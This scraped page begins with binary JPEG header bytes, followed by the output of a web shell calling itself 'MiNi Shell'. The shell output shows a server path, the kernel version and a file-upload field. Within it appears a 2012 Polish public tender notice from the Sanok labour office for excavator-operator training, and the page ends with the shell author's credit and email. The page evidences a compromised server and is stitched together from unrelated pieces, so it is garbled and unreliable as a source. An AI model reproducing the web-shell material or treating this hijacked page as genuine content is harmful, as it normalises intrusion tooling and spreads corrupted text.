JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/80149-N-2012.html

<p class="kh_header"><b>Sanok: Świadczenie usługi szkoleniowej współfinansowanej przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Projekt Systemowy Więcej szans w powiecie sanockim, w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych, pod nazwą Operator maszyn do robót ziemnych .</b><br>
<b>Numer ogłoszenia: 80149 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Sanoku , ul. Rymanowska 20A, 38-500 Sanok, woj. podkarpackie, tel. 0-13 4657000, faks 0-13 4657001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.pup.sanok.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi szkoleniowej współfinansowanej przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Projekt Systemowy Więcej szans w powiecie sanockim, w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych, pod nazwą Operator maszyn do robót ziemnych ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzanie szkolenia grupowego dla 10 osób bezrobotnych posiadających prawo jazdy kat. B, w zakresie obsługi maszyn do robót ziemnych operator koparko ładowarki kl. III i koparki jednonaczyniowej kl III. współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Projekt Systemowy Więcej szans w powiecie sanockim, w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych
Uczestnicy szkolenia nie posiadają 1 miesięcznego stażu pracy na stanowiskach ww. operatorów.
Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy i umiejętności praktycznych niezbędnych do uzyskania stosownych uprawnień do podjęcia pracy w zawodzie operatora maszyn do robót ziemnych kl. III w zakresie koparko ładowarki i koparki jednonaczyniowej, w tym przygotowanie do zdania egzaminu przed komisją powołaną przez Instytut Mechanizacji i Górnictwa Skalnego w Warszawie w celu uzyskania uprawnień zawodowych operatora koparko ładowarki kl. III i koparki jednonaczyniowej kl. III w postaci w postaci książki operatora maszyn wydanej przez Instytut Mechanizacji Budownictwa  i Górnictwa Skalnego  w Warszawie zgodnie z rozporządzeniem Ministra Gospodarki z dn. 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001, Nr 118 poz. 1263.
Program szkolenia będzie realizowany zgodnie z zakresem szkolenia w zawodach określonych w Rozporządzeniu Ministra Gospodarki z dn. 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001, Nr 118 poz. 1263 oraz programem zatwierdzonym przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Program szkolenia ma obejmować zajęcia teoretyczno - zawodowe dotyczące w szczególności zagadnień z zakresu: dokumentacji technicznej maszyn roboczych, bezpieczeństwa i higieny pracy przy eksploatacji maszyn roboczych, technologii wykonywania robót ziemnych, użytkowania i obsługi maszyn roboczych oraz zajęcia praktyczne obejmujące naukę eksploatacji maszyn roboczych w rożnych warunkach terenowych i technologicznych  opartą na instruktażu,a następnie polegającą na samodzielnym wykonywaniu zadań przez uczestników szkolenia. Program szkolenia powinien uwzględniać zróżnicowany poziom umiejętności i wiedzy uczestników szkolenia. Wykonawca przeprowadzi szkolenie zgodnie z przedstawionym Zamawiającemu programem i harmonogramem szkolenia oraz warunkami podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych według rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006 r., Nr 31, poz. 216.
Wykonawca zobowiązany jest do zorganizowania i przeprowadzenia egzaminu wewnętrznego,
a w razie konieczności zapewnienia każdemu uczestnikowi jednego wewnętrznego egzaminu    poprawkowego oraz do wystawienia Zaświadczenia dla uczestników  o pozytywnym ukończeniu szkolenia przygotowaniu do uzyskania  uprawnień operatora na podstawie  par. 6 rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006 r., Nr 31, poz. 216. Zaświadczenie ma być opatrzone  logo EFS, Programu Operacyjnego Kapitał Ludzki oraz informacją o współfinansowaniu Projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
Wykonawca zobowiązany jest do ustalenia terminu i zorganizowania egzaminu państwowego, który zakończy się wydaniem uczestnikowi Świadectwa z wynikiem sprawdzianu na uprawnienia operatora na podstawie  par. 23 i par. 26 rozporządzenia Ministra Gospodarki z dnia  20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych  do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r., Nr 118, poz. 1263 oraz Książki operatora wystawione przez Instytut Budownictwa i Górnictwa Skalnego  w Warszawie potwierdzającej uzyskane uprawienia. Egzamin ten powinien odbyć się bezpośrednio po zrealizowaniu szkolenia. 
Wykonawca musi posiadać stosowne potwierdzenie upoważnienie Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie uprawniające do prowadzenia szkoleń w specjalności odpowiadającej zamówieniu określonemu w niniejszej specyfikacji istotnych warunków zamówienia, stanowiące potwierdzenie spełniania przez dany podmiot wymagań co do posiadania warunków lokalowych do prowadzenia wykładów, parku maszynowego wraz z placem manewrowym, kadrę wykładowców, warunki socjalne i wyposażenie dydaktyczne, o których mowa w par. 25 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych  do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r., Nr 118, poz. 1263.
Zakres organizacyjny szkolenia 
W zakresie zajęć teoretycznych Zamawiający zastrzega realizację szkolenia na terenie miasta Sanoka. Zajęcia teoretyczne i praktyczne w ramach szkolenia powinny odbywać się w godzinach umożliwiających uczestnikom dojazd z miejsca zamieszkana do miejsca szkolenia i powrotu. Zajęcia szkoleniowe będą odbywały się w następującym przedziale godzinowym: rozpoczęcie nie wcześniej niż godz. 8.00, a zakończenie nie później niż godz. 18.00. Szkolenie winno się odbywać w miejscu umożliwiającym dogodne połączenia komunikacyjne z wykorzystaniem transportu miejskiego. Zajęcia szkoleniowe winny odbywać się w dni robocze od poniedziałku do piątku ewentualnie w soboty, jeżeli uprzednio w harmonogramie szkolenia przewidziano realizację zajęć w soboty, przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu, w tym nie mniej niż 5 i nie więcej niż 8 godzin dziennie. 
W przypadku realizacji zajęć praktycznych a także egzaminów poza terenem powiatu sanockiego Wykonawca zapewnia we własnym zakresie uczestnikom szkolenia dojazd z terenu miasta Sanoka do miejsca szkolenia także miejsca egzaminów oraz powrót do miasta Sanoka w każdym dniu lub zapewnia uczestnikom szkolenia zakwaterowanie i wyżywienie w miejscu prowadzenia szkolenia jeżeli miejsce zakwaterowania uczestników jest inne niż miejsce odbywania zajęć także codzienny dojazd z miejsca zakwaterowania do miejsca szkolenia. W takim przypadku zakwaterowanie i wyżywienie należy zapewnić również w dni wolne od zajęć w czasie trwania szkolenia, a także w dni przeprowadzania egzaminów albo transport obejmujący dojazd z miasta Sanoka    i powrót po tygodniu zajęć. Koszty dojazdów, zakwaterowania i wyżywienia należy wliczyć w cenę oferty. Niezależnie od miejsca organizacji szkolenia zajęcia teoretyczne i praktyczne Wykonawca zapewni każdego dnia poczęstunek w postaci: napojów gorących tj. kawa, herbata, innych napojów tj. sok lub woda mineralna oraz pieczywo cukiernicze.
Wykonawca zapewni uczestnikom szkolenia warunki zgodnie z przepisami  bezpieczeństwa i higieny pracy oraz odpowiednie zaplecze sanitarne i socjalne, w tym: 
odpowiednią spełniającą warunki bhp i ppoż salę szkoleniową do przeprowadzenia zajęć teoretyczno zawodowych wyposażoną w odpowiednie tablice np. typu szkolne, magnetyczne czy flipchart, sprawny sprzęt audiowizualny, o liczbie miejsc i stolików dostosowanej do ilości osób szkolonych wraz  z zapleczem sanitarnym,
 odpowiedni warsztat szkoleniowy do zajęć praktycznych tj. niezbędną liczbę, maszyn o stanie technicznym zapewniającym odpowiedni poziom kształcenia.
Wykonawca przekaże uczestnikom szkolenia niezbędne materiały szkoleniowe dydaktyczne  gwarantujące odpowiedni poziom szkolenia oraz na pierwszych zajęciach podstawowe materiały piśmienne potrzebne do prowadzenia notatek    np. notatnik, długopis, które to materiały zostaną ujęte w kosztach szkolenia i po jego zakończeniu przejdą na własność uczestników szkolenia. 
Uwaga Materiały dydaktyczne winny być opatrzone w logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z informacją o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
Wykonawca w dniu rozpoczęcia szkolenia przekaże uczestnikom szkolenia harmonogram zajęć szkoleniowych oraz zapozna uczestników z programem szkolenia. Wykonawca jest zobowiązany do prowadzenia stosownej dokumentacji przebiegu szkolenia, w tym dziennika zajęć, list obecności , protokołów, kart ocen itp.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzonych przez wojewódzki urząd pracy właściwy dla siedziby Wykonawcy, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jedn. Dz. U. z 2008 r. Nr 69, poz. 415, z późn. zm.).  
Ocena spełnienia ww. odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych oraz odrębnego oświadczenia o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę Wykonawcy wojewódzki  urząd pracy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia ww. odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia ww. odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej niżej wymienionymi osobami, które będą uczestniczyły w realizacji zamówienia: 
a) wykładowcami zajęć teoretycznych z przedmiotu zamówienia posiadającymi wyższe wykształcenie techniczne i doświadczenie zawodowe polegające na przeprowadzeniu co najmniej jednego szkolenia, kursu, itp. obejmującego zajęcia teoretyczne z zakresu odpowiednio operatora koparko-ładowarki kl. III lub operatora koparki jednonaczyniowej kl. III, 
b) instruktorami zajęć praktycznych z przedmiotu zamówienia posiadającymi co najmniej średnie wykształcenie techniczne, uprawnienia operatora maszyn do robót ziemnych adekwatne do przedmiotu zamówienia i doświadczenie zawodowe polegające na przeprowadzeniu co najmniej 1 jednego szkolenia, kursu, itp. obejmującego zajęcia praktyczne z zakresu odpowiednio operatora koparko-ładowarki kl. III lub operatora koparki jednonaczyniowej kl. III.
	
W przypadku wykazania osoby, która będzie prowadzić zajęcia z różnych specjalności należy dowieść posiadanie przez tę osobę stosownego doświadczenia zawodowego polegającego na przeprowadzeniu co najmniej jednego szkolenia obejmującego adekwatny zakres zajęć .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia ww. odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Do oferty należy załączyć dokument/-y określające zasady reprezentacji oraz osoby uprawnione do  reprezentacji Wykonawcy. 
2. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Pełnomocnictwo musi być złożone w oryginale albo w kopii poświadczonej notarialnie lub przez mocodawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - jakość usługi szkoleniowej - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
1.Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. W szczególności dopuszczalne są zmiany:
1) Korzystne dla zamawiającego w tym, przewidujące niższą cenę udzielonego zamówienia niż wynikająca z treści oferty bądź szerszy zakres zobowiązania wykonawcy lub kształtujące w sposób korzystniejszy niż wynikało by to z treści oferty sposób zapłaty za udzielone zamówienie, w szczególności w ratach zamiast jednorazowej płatności lub w większej ich liczbie, bądź przewidujące dłuższy termin zapłaty.
2) Przewidujące dłuższy termin wykonania zamówienia na skutek obiektywnych okoliczności których nie można było przewidzieć.
3) Przewidujące zwiększenie ilości godzin szkolenia przypadających na jedną osobę jeśli nie prowadzi to do zwiększenia ceny szkolenia za jedną osobę.
4) Dotyczące zmniejszenia liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego i będącego wynikiem: a) nie podjęcia szkolenia lub rezygnacji kandydata pomimo wcześniejszych deklaracji  o uczestnictwie, b) przerwania uczestnictwa w szkoleniu (podjęcie pracy przez bezrobotnego, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy. 
5) W wyniku wystąpienia okoliczności po stronie Wykonawcy powodujących konieczność zmiany kadry realizującej szkolenie w wyniku nieprzewidywalnych zdarzeń losowych (jak np. choroba, śmierć, utrata uprawnień przez szkoleniowca), których nie można było przewidzieć w dniu zawarcia umowy.
2. Każda zmiana umowy w sprawie zamówienia publicznego wymaga dla swej ważności zachowania formy pisemnej (w postaci podpisanego przez obie strony umowy aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pup.sanok.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Sanoku
Ul. Rymanowska 20a, 38-500 Sanok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Sanoku ul. Rymanowska 20a, 38-500 Sanok, Sekretariat  - budynek A, II piętro, pok. Nr 14. Godziny pracy Sekretariatu: od poniedziałku do piątku od 7:30 do 15:30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> usługa szkoleniowa współfinansowana przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Projekt Systemowy Więcej szans w powiecie sanockim, w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com